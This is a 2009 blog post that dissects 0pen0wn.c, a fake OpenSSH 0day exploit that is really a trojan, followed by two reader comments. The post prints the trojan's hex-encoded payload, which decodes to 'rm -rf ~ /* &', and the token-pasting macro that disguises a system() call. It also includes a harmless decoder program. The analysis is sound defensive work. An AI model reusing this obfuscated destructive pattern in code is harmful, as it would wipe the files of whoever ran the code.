Friday, July 17, 2009

0pen0wn.c uncovered

A friend forwarded me a version of 0pen0wn.c, which claims to be
an OpenSSH 5.2 0day exploit (http://pastebin.com/m86228fd),
a couple of days ago. He did not start it because it looked much
like a trojan. At first I was searching for the typical call of
system() without finding it, but it is there.

The important lines are the following:

char jmpcode[] =
"\x72\x6D\x20\x2D\x72\x66\x20\x7e\x20\x2F\x2A\x20\x32\x3e\x20\x2f"
"\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26";

#define build_frem(x,y,a,b,c) a##c##a##x##y##b
#define fremote build_frem(t,e,s,m,y)

int main(int argc, char **argv){
...
char h[500],buffer[1024];fremote(jmpcode);char *payload, *ptr;
...

The jmpcode appears to be "rm -rf ~ /* 2> /dev/null &".
This means that the call fremote(jmpcode) at the very
beginning of main is effectively:
fremote(rm -rf ~ /* 2> /dev/null &)


Now let's have a look at the macros which build fremote:

#define fremote build_frem(t,e,s,m,y)
is substituted using build_frem(x,y,a,b,c) a##c##a##x##y##b,
so x=t, y=e, a=s, b=m, c=y and the macro expands to
s##y##s##t##e##m, which the ## token-pasting operator joins into "system".

Now you have the call system("rm -rf ~ /* 2> /dev/null &")
in the second line of main!
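Both tricks can be unwound without ever compiling or running the trojan. The following is an added example, not code from the post or from 0pen0wn.c: it reproduces the build_frem macro and lets the preprocessor stringify the pasted identifier, and it decodes the source text of the jmpcode literal (the backslash escapes as they appear above) back into readable bytes. The helper names (pasted_name, decode_c_escapes, decoded_jmpcode) and the two-digit limit on \x escapes are my own choices; nothing in the block calls the result.

```c
/* Added example (not from the original post): unwinds the two obfuscation
 * tricks in 0pen0wn.c statically.
 * 1) The token-pasting macro is reproduced and stringified, so the
 *    preprocessor itself reports which identifier it builds.
 * 2) A small decoder turns the *source text* of a "\x.."-escaped C string
 *    literal back into bytes.
 */
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Same macro as in 0pen0wn.c: a##c##a##x##y##b pastes its arguments into
 * one identifier. It is never used as a function call here. */
#define build_frem(x,y,a,b,c) a##c##a##x##y##b

/* Two-level stringification: XSTR expands its argument first, then STR
 * turns the expanded token into a string literal. */
#define STR(x) #x
#define XSTR(x) STR(x)

/* Returns the identifier the macro pastes together, as text. */
const char *pasted_name(void)
{
    return XSTR(build_frem(t,e,s,m,y));   /* "system" */
}

/* Decodes the source text of a C string literal body (backslash escapes
 * still present, e.g. the six characters \x72\x6D) into bytes.
 * Handles \xHH (at most two hex digits, which matches how 0pen0wn.c is
 * written; standard C would consume every following hex digit), the
 * common single-character escapes, and plain characters.
 * Returns the number of bytes written; out is always NUL-terminated. */
size_t decode_c_escapes(const char *src, char *out, size_t outsz)
{
    size_t n = 0;
    while (*src && n + 1 < outsz) {
        if (*src != '\\') { out[n++] = *src++; continue; }
        src++;                                  /* skip the backslash */
        if (*src == 'x') {
            src++;
            int val = 0, digits = 0;
            while (isxdigit((unsigned char)*src) && digits < 2) {
                char c = (char)tolower((unsigned char)*src);
                val = val * 16 + (isdigit((unsigned char)c) ? c - '0' : c - 'a' + 10);
                src++; digits++;
            }
            out[n++] = (char)val;
        } else {
            switch (*src) {
            case 'n':  out[n++] = '\n'; break;
            case 't':  out[n++] = '\t'; break;
            case '\\': out[n++] = '\\'; break;
            case '"':  out[n++] = '"';  break;
            default:   out[n++] = *src; break;  /* unknown escape: keep char */
            }
            if (*src) src++;
        }
    }
    out[n] = '\0';
    return n;
}

/* Source text of the jmpcode literal from the post, with the backslashes
 * doubled so this array holds the *undecoded* characters. */
static const char jmpcode_src[] =
    "\\x72\\x6D\\x20\\x2D\\x72\\x66\\x20\\x7e\\x20\\x2F\\x2A\\x20\\x32\\x3e\\x20\\x2f"
    "\\x64\\x65\\x76\\x2f\\x6e\\x75\\x6c\\x6c\\x20\\x26";

/* Decodes jmpcode_src into a static buffer and returns it for inspection. */
const char *decoded_jmpcode(void)
{
    static char buf[128];
    decode_c_escapes(jmpcode_src, buf, sizeof buf);
    return buf;
}

int main(void)
{
    printf("macro builds identifier: %s\n", pasted_name());
    printf("jmpcode decodes to     : \"%s\"\n", decoded_jmpcode());
    return 0;
}
```

The same stringification trick works on any suspicious macro chain: wrap the outermost macro in XSTR and print it, and the compiler tells you the real callee without you having to trace the ## operands by hand. Running cpp -E over the file gives the same answer for the whole translation unit.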

I really wonder why the authors did not make it public
to many people to do more damage, but if they do one day:

Don't start it! ;-D

2 comments:

  1. so, it deletes everything on your drive right? LOL do you think there's a real one in the wild?

  2. Yes, you can find users on Google who have "successfully" compiled and run the code.

    bonkers.
